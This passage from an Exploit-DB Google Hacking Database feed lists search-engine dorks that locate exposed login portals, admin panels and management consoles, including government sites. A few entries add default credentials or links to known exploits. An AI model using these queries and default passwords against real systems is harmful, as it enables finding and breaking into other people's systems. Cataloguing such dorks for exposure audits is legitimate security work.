<link>https://www.exploit-db.com/ghdb/8245</link>
<category>Pages Containing Login Portals</category>
<shortDescription>allintitle: &quot;smart office suite - login page&quot;</shortDescription>
<textualDescription># Google Dork: allintitle: &quot;smart office suite - login page&quot;
# Pages Containing Login Portals
# Date: 02/10/2023
# Exploit Abhilash Gangane</textualDescription>
<query>allintitle: &quot;smart office suite - login page&quot;</query>
<querystring>https://www.google.com/search?q=allintitle: &quot;smart office suite - login page&quot;</querystring>
<edb></edb>
<date>2023-10-02</date>
<author>Abhilash Gangane</author>
</entry>
<entry>
<id>8096</id>
<link>https://www.exploit-db.com/ghdb/8096</link>
<category>Pages Containing Login Portals</category>
<shortDescription>allintitle:&quot;Building Operation WebStation&quot;</shortDescription>
<textualDescription># Google Dork: allintitle:&quot;Building Operation WebStation&quot;
# Pages Containing Login Portals
# Date:27/02/2023
# Exploit Author: GirlsLearnCyber</textualDescription>
<query>allintitle:&quot;Building Operation WebStation&quot;</query>
<querystring>https://www.google.com/search?q=allintitle:&quot;Building Operation WebStation&quot;</querystring>
<edb></edb>
<date>2023-02-27</date>
<author>GirlsLearnCyber</author>
</entry>
<entry>
<id>6591</id>
<link>https://www.exploit-db.com/ghdb/6591</link>
<category>Pages Containing Login Portals</category>
<shortDescription>allintitle:&quot;CrushFTP WebInterface&quot;</shortDescription>
<textualDescription>Google Dork: allintitle:&quot;CrushFTP WebInterface&quot;
Description: This Google Dork helps in detecting various pages of CrushFTP
WebInterface which includes login portals as well password reset/recovery
pages.
Author: Sibi Mathew George
</textualDescription>
<query>allintitle:&quot;CrushFTP WebInterface&quot;</query>
<querystring>https://www.google.com/search?q=allintitle:&quot;CrushFTP WebInterface&quot;</querystring>
<edb></edb>
<date>2020-10-05</date>
<author>Sibi Mathew George</author>
</entry>
<entry>
<id>8102</id>
<link>https://www.exploit-db.com/ghdb/8102</link>
<category>Pages Containing Login Portals</category>
<shortDescription>allintitle:&quot;Cyberoam SSL VPN Portal&quot;</shortDescription>
<textualDescription># Google Dork: allintitle:&quot;Cyberoam SSL VPN Portal&quot;
# Pages Containing Login Portals
# Date:07/03/2023
# Exploit Author: GirlsLearnCyber</textualDescription>
<query>allintitle:&quot;Cyberoam SSL VPN Portal&quot;</query>
<querystring>https://www.google.com/search?q=allintitle:&quot;Cyberoam SSL VPN Portal&quot;</querystring>
<edb></edb>
<date>2023-03-07</date>
<author>GirlsLearnCyber</author>
</entry>
<entry>
<id>8090</id>
<link>https://www.exploit-db.com/ghdb/8090</link>
<category>Pages Containing Login Portals</category>
<shortDescription>allintitle:&quot;Eclypse Login&quot;</shortDescription>
<textualDescription># Google Dork: allintitle:&quot;Eclypse Login&quot;
# Pages Containing Login Portals
# Date:27/02/2023
# Exploit Author: GirlsLearnCyber</textualDescription>
<query>allintitle:&quot;Eclypse Login&quot;</query>
<querystring>https://www.google.com/search?q=allintitle:&quot;Eclypse Login&quot;</querystring>
<edb></edb>
<date>2023-02-27</date>
<author>GirlsLearnCyber</author>
</entry>
<entry>
<id>8094</id>
<link>https://www.exploit-db.com/ghdb/8094</link>
<category>Pages Containing Login Portals</category>
<shortDescription>allintitle:&quot;eSlideManager - Login&quot;</shortDescription>
<textualDescription># Google Dork: allintitle:&quot;eSlideManager - Login&quot;
# Pages Containing Login Portals
# Date:27/02/2023
# Exploit Author: GirlsLearnCyber</textualDescription>
<query>allintitle:&quot;eSlideManager - Login&quot;</query>
<querystring>https://www.google.com/search?q=allintitle:&quot;eSlideManager - Login&quot;</querystring>
<edb></edb>
<date>2023-02-27</date>
<author>GirlsLearnCyber</author>
</entry>
<entry>
<id>8023</id>
<link>https://www.exploit-db.com/ghdb/8023</link>
<category>Pages Containing Login Portals</category>
<shortDescription>allintitle:&quot;Log on to MACH-ProWeb&quot;</shortDescription>
<textualDescription># Google Dork: allintitle:&quot;Log on to MACH-ProWeb&quot;
# Pages Containing Login Portals
# Date: 13/08/2022
# Exploit Author: HackerFrenzy</textualDescription>
<query>allintitle:&quot;Log on to MACH-ProWeb&quot;</query>
<querystring>https://www.google.com/search?q=allintitle:&quot;Log on to MACH-ProWeb&quot;</querystring>
<edb></edb>
<date>2022-08-17</date>
<author>Under The Sea hacker</author>
</entry>
<entry>
<id>8120</id>
<link>https://www.exploit-db.com/ghdb/8120</link>
<category>Pages Containing Login Portals</category>
<shortDescription>allintitle:&quot;Login | Control WebPanel&quot; Control WebPanel Login</shortDescription>
<textualDescription># Google Dork: allintitle:&quot;Login | Control WebPanel&quot; Control WebPanel Login
# Pages Containing Login Portals
# Date:16/03/2023
# Exploit Author: Aditya Raj Singh</textualDescription>
<query>allintitle:&quot;Login | Control WebPanel&quot; Control WebPanel Login</query>
<querystring>https://www.google.com/search?q=allintitle:&quot;Login | Control WebPanel&quot; Control WebPanel Login</querystring>
<edb></edb>
<date>2023-03-16</date>
<author>Aditya Raj Singh</author>
</entry>
<entry>
<id>8143</id>
<link>https://www.exploit-db.com/ghdb/8143</link>
<category>Pages Containing Login Portals</category>
<shortDescription>allintitle:&quot;Login | wplogin Login</shortDescription>
<textualDescription># Google Dork: allintitle:&quot;Login | wplogin Login
# Pages Containing Login Portals
# Date: 06/04/2023
# Exploit Author: MD Hasib
</textualDescription>
<query>allintitle:&quot;Login | wplogin Login</query>
<querystring>https://www.google.com/search?q=allintitle:&quot;Login | wplogin Login</querystring>
<edb></edb>
<date>2023-04-06</date>
<author>Md Hasib</author>
</entry>
<entry>
<id>6478</id>
<link>https://www.exploit-db.com/ghdb/6478</link>
<category>Pages Containing Login Portals</category>
<shortDescription>allintitle:&quot;MDVR Login&quot;</shortDescription>
<textualDescription>Google Dork: allintitle:&quot;MDVR Login&quot;
Description: This google dork is useful for detecting all the login portals
of MDVR based devices.
Author: Sibi Mathew George
</textualDescription>
<query>allintitle:&quot;MDVR Login&quot;</query>
<querystring>https://www.google.com/search?q=allintitle:&quot;MDVR Login&quot;</querystring>
<edb></edb>
<date>2020-08-13</date>
<author>Sibi Mathew George</author>
</entry>
<entry>
<id>7485</id>
<link>https://www.exploit-db.com/ghdb/7485</link>
<category>Pages Containing Login Portals</category>
<shortDescription>allintitle:&quot;MeshCentral - Login&quot;</shortDescription>
<textualDescription># Google Dork: allintitle:&quot;MeshCentral - Login&quot;
# Pages Containing Login Portals
# Date:25/10/2021
# Exploit Author: César Hernández Obispo</textualDescription>
<query>allintitle:&quot;MeshCentral - Login&quot;</query>
<querystring>https://www.google.com/search?q=allintitle:&quot;MeshCentral - Login&quot;</querystring>
<edb></edb>
<date>2021-10-25</date>
<author>César Hernández Obispo</author>
</entry>
<entry>
<id>8125</id>
<link>https://www.exploit-db.com/ghdb/8125</link>
<category>Pages Containing Login Portals</category>
<shortDescription>allintitle:&quot;MobileIron User Portal: Sign In&quot;</shortDescription>
<textualDescription># Google Dork: allintitle:&quot;MobileIron User Portal: Sign In&quot;
# Pages Containing Login Portals
# Date:29/03/2023
# Exploit Author: Heverin Hacker</textualDescription>
<query>allintitle:&quot;MobileIron User Portal: Sign In&quot;</query>
<querystring>https://www.google.com/search?q=allintitle:&quot;MobileIron User Portal: Sign In&quot;</querystring>
<edb></edb>
<date>2023-03-29</date>
<author>Heverin Hacker</author>
</entry>
<entry>
<id>8092</id>
<link>https://www.exploit-db.com/ghdb/8092</link>
<category>Pages Containing Login Portals</category>
<shortDescription>allintitle:&quot;OMERO.web - Login&quot;</shortDescription>
<textualDescription># Google Dork: allintitle:&quot;OMERO.web - Login&quot;
# Pages Containing Login Portals
# Date:27/02/2023
# Exploit Author: GirlsLearnCyber</textualDescription>
<query>allintitle:&quot;OMERO.web - Login&quot;</query>
<querystring>https://www.google.com/search?q=allintitle:&quot;OMERO.web - Login&quot;</querystring>
<edb></edb>
<date>2023-02-27</date>
<author>GirlsLearnCyber</author>
</entry>
<entry>
<id>8176</id>
<link>https://www.exploit-db.com/ghdb/8176</link>
<category>Pages Containing Login Portals</category>
<shortDescription>allintitle:&quot;Opengear Management Console&quot;</shortDescription>
<textualDescription># Google Dork: allintitle:&quot;Opengear Management Console&quot;
# Pages Containing Login Portals
# Date:05/05/2023
# Exploit Author: GirlsLearnCyber</textualDescription>
<query>allintitle:&quot;Opengear Management Console&quot;</query>
<querystring>https://www.google.com/search?q=allintitle:&quot;Opengear Management Console&quot;</querystring>
<edb></edb>
<date>2023-05-05</date>
<author>GirlsLearnCyber</author>
</entry>
<entry>
<id>8127</id>
<link>https://www.exploit-db.com/ghdb/8127</link>
<category>Pages Containing Login Portals</category>
<shortDescription>allintitle:&quot;ResolutionMD Login&quot;</shortDescription>
<textualDescription># Google Dork: allintitle:&quot;ResolutionMD Login&quot;
# Pages Containing Login Portals
# Date:29/03/2023
# Exploit Author: Heverin Hacker</textualDescription>
<query>allintitle:&quot;ResolutionMD Login&quot;</query>
<querystring>https://www.google.com/search?q=allintitle:&quot;ResolutionMD Login&quot;</querystring>
<edb></edb>
<date>2023-03-29</date>
<author>Heverin Hacker</author>
</entry>
<entry>
<id>8095</id>
<link>https://www.exploit-db.com/ghdb/8095</link>
<category>Pages Containing Login Portals</category>
<shortDescription>allintitle:&quot;Supermicro BMC Login&quot;</shortDescription>
<textualDescription># Google Dork: allintitle:&quot;Supermicro BMC Login&quot;
# Pages Containing Login Portals
# Date:27/02/2023
# Exploit Author: GirlsLearnCyber</textualDescription>
<query>allintitle:&quot;Supermicro BMC Login&quot;</query>
<querystring>https://www.google.com/search?q=allintitle:&quot;Supermicro BMC Login&quot;</querystring>
<edb></edb>
<date>2023-02-27</date>
<author>GirlsLearnCyber</author>
</entry>
<entry>
<id>8126</id>
<link>https://www.exploit-db.com/ghdb/8126</link>
<category>Pages Containing Login Portals</category>
<shortDescription>allintitle:&quot;Synapse Mobility Login&quot;</shortDescription>
<textualDescription># Google Dork: allintitle:&quot;Synapse Mobility Login&quot;
# Pages Containing Login Portals
# Date:29/03/2023
# Exploit Author: Heverin Hacker</textualDescription>
<query>allintitle:&quot;Synapse Mobility Login&quot;</query>
<querystring>https://www.google.com/search?q=allintitle:&quot;Synapse Mobility Login&quot;</querystring>
<edb></edb>
<date>2023-03-29</date>
<author>Heverin Hacker</author>
</entry>
<entry>
<id>8091</id>
<link>https://www.exploit-db.com/ghdb/8091</link>
<category>Pages Containing Login Portals</category>
<shortDescription>allintitle:&quot;TutorTrac Login&quot;</shortDescription>
<textualDescription># Google Dork: allintitle:&quot;TutorTrac Login&quot;
# Pages Containing Login Portals
# Date:27/02/2023
# Exploit Author: GirlsLearnCyber</textualDescription>
<query>allintitle:&quot;TutorTrac Login&quot;</query>
<querystring>https://www.google.com/search?q=allintitle:&quot;TutorTrac Login&quot;</querystring>
<edb></edb>
<date>2023-02-27</date>
<author>GirlsLearnCyber</author>
</entry>
<entry>
<id>8093</id>
<link>https://www.exploit-db.com/ghdb/8093</link>
<category>Pages Containing Login Portals</category>
<shortDescription>allintitle:&quot;Untangle Administrator Login&quot;</shortDescription>
<textualDescription># Google Dork: allintitle:&quot;Untangle Administrator Login&quot;
# Pages Containing Login Portals
# Date:27/02/2023
# Exploit Author: GirlsLearnCyber</textualDescription>
<query>allintitle:&quot;Untangle Administrator Login&quot;</query>
<querystring>https://www.google.com/search?q=allintitle:&quot;Untangle Administrator Login&quot;</querystring>
<edb></edb>
<date>2023-02-27</date>
<author>GirlsLearnCyber</author>
</entry>
<entry>
<id>6508</id>
<link>https://www.exploit-db.com/ghdb/6508</link>
<category>Pages Containing Login Portals</category>
<shortDescription>allintitle:&quot;Welcome admin&quot;</shortDescription>
<textualDescription>allintitle:&quot;Welcome admin&quot;
Dork shows admin pages of various sites
</textualDescription>
<query>allintitle:&quot;Welcome admin&quot;</query>
<querystring>https://www.google.com/search?q=allintitle:&quot;Welcome admin&quot;</querystring>
<edb></edb>
<date>2020-08-31</date>
<author>rahulsr2714</author>
</entry>
<entry>
<id>998</id>
<link>https://www.exploit-db.com/ghdb/998</link>
<category>Pages Containing Login Portals</category>
<shortDescription>allintitle:&quot;Welcome to the Cyclades&quot;</shortDescription>
<textualDescription>This search reveals the login page for the Cyclades TS1000 and TS2000 Web Management Service. The Cyclades TS1000 and TS200 devices are Console servers, based on a cut down Linux version. These lovely devices sit on the network with console cables attached to them, so that you then gain access to this device, and then have console access to any of the hosts connected to the console ports. :-)The default username and password for these devices is, root/tslinux.This query currently only returns pages available in Google's cache (but in the future more devices may be returned).</textualDescription>
<query>allintitle:&quot;Welcome to the Cyclades&quot;</query>
<querystring>https://www.google.com/search?q=allintitle%3A%22Welcome+to+the+Cyclades%22&amp;btnG=Google+Search</querystring>
<edb></edb>
<date>2005-06-02</date>
<author>anonymous</author>
</entry>
<entry>
<id>8044</id>
<link>https://www.exploit-db.com/ghdb/8044</link>
<category>Pages Containing Login Portals</category>
<shortDescription>allintitle:&quot;wireless controller login&quot;</shortDescription>
<textualDescription># Google Dork: allintitle:&quot;wireless controller login&quot;
# Pages Containing Login Portals
# Date:31/01/2023
# Exploit Author: GirlsLearnCyber</textualDescription>
<query>allintitle:&quot;wireless controller login&quot;</query>
<querystring>https://www.google.com/search?q=allintitle:&quot;wireless controller login&quot;</querystring>
<edb></edb>
<date>2023-01-31</date>
<author>GirlsLearnCyber</author>
</entry>
<entry>
<id>3925</id>
<link>https://www.exploit-db.com/ghdb/3925</link>
<category>Pages Containing Login Portals</category>
<shortDescription>allinurl:&quot;/main/auth/profile.php&quot; -github -google</shortDescription>
<textualDescription>[+] This dork will help you find Chamilo login portals. Depending on the
version, the site could be vulnerable to SQL injection.
See Here-
https://www.exploit-db.com/exploits/30012/
Regards,
necrodamus
http://www.twitter.com/necrodamus2600</textualDescription>
<query>allinurl:&quot;/main/auth/profile.php&quot; -github -google</query>
<querystring>https://www.google.com/search?q=allinurl:&quot;/main/auth/profile.php&quot; -github -google</querystring>
<edb>https://www.exploit-db.com/exploits/30012</edb>
<date>2014-01-03</date>
<author>anonymous</author>
</entry>
<entry>
<id>162</id>
<link>https://www.exploit-db.com/ghdb/162</link>
<category>Pages Containing Login Portals</category>
<shortDescription>allinurl:&quot;exchange/logon.asp&quot;</shortDescription>
<textualDescription>According to Microsoft &quot;Microsoft (R) Outlook (TM) Web Access is a Microsoft Exchange Active Server Application that gives you private access to your Microsoft Outlook or Microsoft Exchange personal e-mail account so that you can view your Inbox from any Web Browser. It also allows you to view Exchange server public folders and the Address Book from the World Wide Web. Anyone can post messages anonymously to public folders or search for users in the Address Book. &quot; Now, consider for a moment and you will understand why this could be potentially bad.</textualDescription>
<query>allinurl:&quot;exchange/logon.asp&quot;</query>
<querystring>https://www.google.com/search?q=allinurl%3A%22exchange%2Flogon.asp%22</querystring>
<edb></edb>
<date>2004-04-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>3900</id>
<link>https://www.exploit-db.com/ghdb/3900</link>
<category>Pages Containing Login Portals</category>
<shortDescription>allinurl:&quot;owa/auth/logon.aspx&quot; -google -github</shortDescription>
<textualDescription>[+] Description - Find OWA login portals
Regards,
necrodamus
http://www.twitter.com/necrodamus2600</textualDescription>
<query>allinurl:&quot;owa/auth/logon.aspx&quot; -google -github</query>
<querystring>https://www.google.com/search?q=allinurl:&quot;owa/auth/logon.aspx&quot; -google -github</querystring>
<edb></edb>
<date>2013-11-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>3929</id>
<link>https://www.exploit-db.com/ghdb/3929</link>
<category>Pages Containing Login Portals</category>
<shortDescription>allinurl:&quot;zimbra/?zinitmode=http&quot; -google -github</shortDescription>
<textualDescription>zimbra webmail login page lookup
allinurl:&quot;zimbra/?zinitmode=http&quot; -google -github
--
-----------------------------------------------------------------
*|JJohnny *RANDRIAMAMPIONONA |
| Phone: (+261) 33 08 003 61 |
| NSS Engineer | IS Security Enthusiast |
| |----------------------------------------------------------------|</textualDescription>
<query>allinurl:&quot;zimbra/?zinitmode=http&quot; -google -github</query>
<querystring>https://www.google.com/search?q=allinurl:&quot;zimbra/?zinitmode=http&quot; -google -github</querystring>
<edb></edb>
<date>2014-02-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>7264</id>
<link>https://www.exploit-db.com/ghdb/7264</link>
<category>Pages Containing Login Portals</category>
<shortDescription>allinurl:logon.html CSCOE</shortDescription>
<textualDescription># Google Dork: allinurl:logon.html CSCOE
# Pages Containing Login Portals
# Date:19/09/2021
# Exploit Author: Yazan Z Al-Mallah</textualDescription>
<query>allinurl:logon.html CSCOE</query>
<querystring>https://www.google.com/search?q=allinurl:logon.html CSCOE</querystring>
<edb></edb>
<date>2021-09-20</date>
<author>Yazan Z Al-Mallah</author>
</entry>
<entry>
<id>6343</id>
<link>https://www.exploit-db.com/ghdb/6343</link>
<category>Pages Containing Login Portals</category>
<shortDescription>allinurl:tsweb/default.htm</shortDescription>
<textualDescription># Google Dork: allinurl:tsweb/default.htm
# Juicy information and sensitive directories regarding Remote Desktop Web
# Connection
# Date: 29/06/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>allinurl:tsweb/default.htm</query>
<querystring>https://www.google.com/search?q=allinurl:tsweb/default.htm</querystring>
<edb></edb>
<date>2020-06-30</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>896</id>
<link>https://www.exploit-db.com/ghdb/896</link>
<category>Pages Containing Login Portals</category>
<shortDescription>allinurl:wps/portal/ login</shortDescription>
<textualDescription>Login to IBM WebSphere Portal.You may find portals using standard administrator user/password which gave you complete access to the application itself.</textualDescription>
<query>allinurl:wps/portal/ login</query>
<querystring>https://www.google.com/search?q=allinurl%3Awps%2Fportal%2F+login&amp;btnG=Cerca</querystring>
<edb></edb>
<date>2005-02-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>380</id>
<link>https://www.exploit-db.com/ghdb/380</link>
<category>Pages Containing Login Portals</category>
<shortDescription>ASP.login_aspx &quot;ASP.NET_SessionId&quot;</shortDescription>
<textualDescription>.NET based login pages serving the whole environment and process trace for your viewing pleasure.. These are often found on test servers, just before going online to the general public I guess. If the current page has no debugging information any longer, an attacker could still look at Google's cached version.</textualDescription>
<query>ASP.login_aspx &quot;ASP.NET_SessionId&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=ASP.login_aspx+%22ASP.NET_SessionId%22</querystring>
<edb></edb>
<date>2004-07-26</date>
<author>anonymous</author>
</entry>
<entry>
<id>4022</id>
<link>https://www.exploit-db.com/ghdb/4022</link>
<category>Pages Containing Login Portals</category>
<shortDescription>Auth inurl:welcome ext:cgi</shortDescription>
<textualDescription>A lot of Pages with logins portals.
Enjoy.
By Rootkit.</textualDescription>
<query>Auth inurl:welcome ext:cgi</query>
<querystring>https://www.google.com/search?q=Auth inurl:welcome ext:cgi</querystring>
<edb></edb>
<date>2015-06-23</date>
<author>anonymous</author>
</entry>
<entry>
<id>294</id>
<link>https://www.exploit-db.com/ghdb/294</link>
<category>Pages Containing Login Portals</category>
<shortDescription>CGI:IRC Login</shortDescription>
<textualDescription>CGIIRC is a web-based IRC client. Using a non-transparent proxy an attacker could communicate anonymously by sending direct messages to a contact. Most servers are restricted to one irc server and one or more default channels and will not let allow access to anything else.</textualDescription>
<query>filetype:cgi inurl:&quot;irc.cgi&quot; | intitle:&quot;CGI:IRC Login&quot;</query>
<querystring>https://www.google.com/search?q=filetype%3Acgi+inurl%3A%22irc.cgi%22+%7C+intitle%3A%22CGI%3AIRC+Login%22+&amp;btnG=Google+Search</querystring>
<edb></edb>
<date>2004-06-22</date>
<author>anonymous</author>
</entry>
<entry>
<id>7172</id>
<link>https://www.exploit-db.com/ghdb/7172</link>
<category>Pages Containing Login Portals</category>
<shortDescription>cms +inurl:login +site:&quot;gov.in&quot;</shortDescription>
<textualDescription># Google Dork: cms +inurl:login +site:&quot;gov.in&quot;
# Pages Containing Login Portals
# Date: 04/08/2021
# Exploit Author: Ujas Dhami</textualDescription>
<query>cms +inurl:login +site:&quot;gov.in&quot;</query>
<querystring>https://www.google.com/search?q=cms +inurl:login +site:&quot;gov.in&quot;</querystring>
<edb></edb>
<date>2021-09-09</date>
<author>Ujas Dhami</author>
</entry>
<entry>
<id>7214</id>
<link>https://www.exploit-db.com/ghdb/7214</link>
<category>Pages Containing Login Portals</category>
<shortDescription>cms inurl:login site:&quot;gov.ae&quot;</shortDescription>
<textualDescription># Google Dork: cms inurl:login site:&quot;gov.ae&quot;
# Pages Containing Login Portals
# Date: 12/09/2021
# Exploit Author: Saiju Pillai</textualDescription>
<query>cms inurl:login site:&quot;gov.ae&quot;</query>
<querystring>https://www.google.com/search?q=cms inurl:login site:&quot;gov.ae&quot;</querystring>
<edb></edb>
<date>2021-09-14</date>
<author>Saiju Pillai</author>
</entry>
<entry>
<id>7271</id>
<link>https://www.exploit-db.com/ghdb/7271</link>
<category>Pages Containing Login Portals</category>
<shortDescription>companies' service login Login Portal</shortDescription>
<textualDescription># Google Dork: companies' service login Login Portal
# Pages Containing Login Portals
# Date: 17/09/2021
# Exploit Author: Sonu Chaudhary</textualDescription>
<query>companies' service login Login Portal</query>
<querystring>https://www.google.com/search?q=companies' service login Login Portal</querystring>
<edb></edb>
<date>2021-09-21</date>
<author>Sonu Chaudhary</author>
</entry>
<entry>
<id>6801</id>
<link>https://www.exploit-db.com/ghdb/6801</link>
<category>Pages Containing Login Portals</category>
<shortDescription>Copyright Huawei Technologies co. Ltd &quot;Account&quot; &quot;Password&quot; -site:huawei.com</shortDescription>
<textualDescription># Dork: Copyright Huawei Technologies co. Ltd &quot;Account&quot; &quot;Password&quot; -site:huawei.com</textualDescription>
<query>Copyright Huawei Technologies co. Ltd &quot;Account&quot; &quot;Password&quot; -site:huawei.com</query>
<querystring>https://www.google.com/search?q=Copyright Huawei Technologies co. Ltd &quot;Account&quot; &quot;Password&quot; -site:huawei.com</querystring>
<edb></edb>
<date>2021-02-17</date>
<author>Amin Seifi</author>
</entry>
<entry>
<id>7388</id>
<link>https://www.exploit-db.com/ghdb/7388</link>
<category>Pages Containing Login Portals</category>
<shortDescription>Dork - inurl: &quot;site admin&quot;</shortDescription>
<textualDescription># Google Dork: Dork - inurl: &quot;site admin&quot;
# Pages Containing Login Portals
# Date:04/10/2021
# Exploit Author: Zeshan Ahmad</textualDescription>
<query>Dork - inurl: &quot;site admin&quot;</query>
<querystring>https://www.google.com/search?q=Dork - inurl: &quot;site admin&quot;</querystring>
<edb></edb>
<date>2021-10-05</date>
<author>Zeshan Ahmad</author>
</entry>
<entry>
<id>7984</id>
<link>https://www.exploit-db.com/ghdb/7984</link>
<category>Pages Containing Login Portals</category>
<shortDescription>Dork for Employees Self Service(ESS) Login Portals</shortDescription>
<textualDescription># Google Dork: intext:ESS inurl:login
# Pages Containing Login Portals
# Date:20/07/2022
# Exploit Author: Shiva Medituru</textualDescription>
<query>Dork for Employees Self Service(ESS) Login Portals</query>
<querystring>https://www.google.com/search?q=Dork for Employees Self Service(ESS) Login Portals</querystring>
<edb></edb>
<date>2022-07-20</date>
<author>Shiva Medituru</author>
</entry>
<entry>
<id>7139</id>
<link>https://www.exploit-db.com/ghdb/7139</link>
<category>Pages Containing Login Portals</category>
<shortDescription>Dork: intitle:*admin (inurl:login)</shortDescription>
<textualDescription># Google Dork: intitle:*admin (inurl:login)
# Pages Containing Login Portals
# Date: 29/08/2021
# Exploit Author: Durgesh Gupta </textualDescription>
<query>Dork:- intitle:*admin (inurl:login)</query>
<querystring>https://www.google.com/search?q=Dork:- intitle:*admin (inurl:login)</querystring>
<edb></edb>
<date>2021-08-31</date>
<author>Durgesh Gupta</author>
</entry>
<entry>
<id>910</id>
<link>https://www.exploit-db.com/ghdb/910</link>
<category>Pages Containing Login Portals</category>
<shortDescription>ext:cgi intitle:&quot;control panel&quot; &quot;enter your owner password to continue!&quot;</shortDescription>
<textualDescription>Free Perl Guestbook (FPG) administration page. Only a password is needed to logon.</textualDescription>
<query>ext:cgi intitle:&quot;control panel&quot; &quot;enter your owner password to continue!&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;q=ext%3Acgi++intitle%3A%22control+panel%22+%22enter+your+owner+password+to+continue%21%22</querystring>
<edb></edb>
<date>2005-03-20</date>
<author>anonymous</author>
</entry>
<entry>
<id>4168</id>
<link>https://www.exploit-db.com/ghdb/4168</link>
<category>Pages Containing Login Portals</category>
<shortDescription>ext:html intext:Airties inurl:login.html</shortDescription>
<textualDescription>AirTies Modems
ext:html intext:Airties inurl:login.html
atawho-sonadam</textualDescription>
<query>ext:html intext:Airties inurl:login.html</query>
<querystring>https://www.google.com/search?q=ext:html intext:Airties inurl:login.html</querystring>
<edb></edb>
<date>2015-12-30</date>
<author>anonymous</author>
</entry>
<entry>
<id>484</id>
<link>https://www.exploit-db.com/ghdb/484</link>
<category>Pages Containing Login Portals</category>
<shortDescription>ez Publish administration</shortDescription>
<textualDescription>Thousands of enterprises, governmental offices, non-profit organizations, small and middle sized companies and educational institutions around the world trust eZ publish for running their web solutions.Vendor site: http://www.ez.no/Vulnerabilities: http://search.securityfocus.com/swsearch?query=ez+publish&amp;sbm=bid&amp;submit=Search%21&amp;metaname=alldoc&amp;sort=swishlastmodifiedDepending on the version two queries can usedAdmin intitle:&quot;eZ publish administration&quot;intitle:&quot;Login&quot; &quot;Welcome to eZ publish administration&quot;Crosssite Scriting, Information Disclosure, Pathdisclosure available on older versions</textualDescription>
<query>Admin intitle:&quot;eZ publish administration&quot;</query>
<querystring>https://www.google.com/search?q=Admin+intitle%3A%22eZ+publish+administration%22</querystring>
<edb></edb>
<date>2004-09-21</date>
<author>anonymous</author>
</entry>
<entry>
<id>4249</id>
<link>https://www.exploit-db.com/ghdb/4249</link>
<category>Pages Containing Login Portals</category>
<shortDescription>filetype:asp intitle:&quot; Microsoft Outlook Web Access&quot;</shortDescription>
<textualDescription>Dork who get access to &quot;Microsoft Outlook Web Access&quot; Panels.
Best Regards.
Rootkit Pentester.</textualDescription>
<query>filetype:asp intitle:&quot; Microsoft Outlook Web Access&quot;</query>
<querystring>https://www.google.com/search?q=filetype:asp intitle:&quot; Microsoft Outlook Web Access&quot;</querystring>
<edb></edb>
<date>2016-03-30</date>
<author>anonymous</author>
</entry>
<entry>
<id>7467</id>
<link>https://www.exploit-db.com/ghdb/7467</link>
<category>Pages Containing Login Portals</category>
<shortDescription>filetype:conf intext:&quot;Footer Powered By&quot;</shortDescription>
<textualDescription># Google Dork: filetype:conf intext:&quot;Footer Powered By&quot;
# Pages Containing Login Portals
# Date: 20/10/2021
# Exploit Author: Sandesh Ajgekar
</textualDescription>
<query>filetype:conf intext:&quot;Footer Powered By&quot;</query>
<querystring>https://www.google.com/search?q=filetype:conf intext:&quot;Footer Powered By&quot;</querystring>
<edb></edb>
<date>2021-10-20</date>
<author>Sandesh Ajgekar</author>
</entry>
<entry>
<id>5073</id>
<link>https://www.exploit-db.com/ghdb/5073</link>
<category>Pages Containing Login Portals</category>
<shortDescription>filetype:cwr inurl:apstoken</shortDescription>
<textualDescription>AUTHOR: FlyingFrog
Twitter: @ItsKarl0z
++ SAP crystal reports business enterprise login ++
filetype:cwr inurl:apstoken
- Login portals for crystal reports
- Enterprise reports
- Error messages
- Possible Cross-Site Scripting
- https://www.exploit-db.com/exploits/32882
- Possible Directory Traversal
- https://www.exploit-db.com/exploits/16054
- 7 results at the time of writing
DISCLAIMER:
(The vulnerabilities are suggestions, none of them have been tested by me,
always request permission before testing anything on someone else system)
Credit goes to the boys of Rapid7
</textualDescription>
<query>filetype:cwr inurl:apstoken</query>
<querystring>https://www.google.com/search?q=filetype:cwr inurl:apstoken</querystring>
<edb></edb>
<date>2019-01-09</date>
<author>FlyingFrog</author>
</entry>
<entry>
<id>310</id>
<link>https://www.exploit-db.com/ghdb/310</link>
<category>Pages Containing Login Portals</category>
<shortDescription>filetype:php inurl:&quot;webeditor.php&quot;</shortDescription>
<textualDescription>This is a standard login portal for the webadmin program.</textualDescription>
<query>filetype:php inurl:&quot;webeditor.php&quot;</query>
<querystring>https://www.google.com/search?q=filetype%3Aphp+inurl%3A%22webeditor.php%22</querystring>
<edb></edb>
<date>2004-07-09</date>
<author>anonymous</author>
</entry>
<entry>
<id>473</id>
<link>https://www.exploit-db.com/ghdb/473</link>
<category>Pages Containing Login Portals</category>
<shortDescription>filetype:pl &quot;Download: SuSE Linux Openexchange Server CA&quot;</shortDescription>
<textualDescription>this search will get you on the web administration portal of linux open exchange servers.</textualDescription>
<query>filetype:pl &quot;Download: SuSE Linux Openexchange Server CA&quot;</query>
<querystring>https://www.google.com/search?hl=de&amp;q=filetype%3Apl+%22Download%3A+SuSE+Linux+Openexchange+Server+CA%22+%0D%0A+%0D%0A&amp;btnG=Google-Suche</querystring>
<edb></edb>
<date>2004-09-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>4868</id>
<link>https://www.exploit-db.com/ghdb/4868</link>
<category>Pages Containing Login Portals</category>
<shortDescription>filetype:png | &quot;proportal&quot;</shortDescription>
<textualDescription>Find ProPortal login portals.
also: &quot;Version 18.2.0&quot; &quot;ProPortal&quot;
~ CrimsonTorso
</textualDescription>
<query>filetype:png | &quot;proportal&quot;</query>
<querystring>https://www.google.com/search?q=filetype:png | &quot;proportal&quot;</querystring>
<edb></edb>
<date>2018-06-22</date>
<author>CrimsonTorso</author>
</entry>
<entry>
<id>4272</id>
<link>https://www.exploit-db.com/ghdb/4272</link>
<category>Pages Containing Login Portals</category>
<shortDescription>filetype:pwd intitle:index</shortDescription>
<textualDescription>Google dork:
filetype:pwd intitle:index
D0bby</textualDescription>
<query>filetype:pwd intitle:index</query>
<querystring>https://www.google.com/search?q=filetype:pwd intitle:index</querystring>
<edb></edb>
<date>2016-04-29</date>
<author>anonymous</author>
</entry>
<entry>
<id>268</id>
<link>https://www.exploit-db.com/ghdb/268</link>
<category>Pages Containing Login Portals</category>
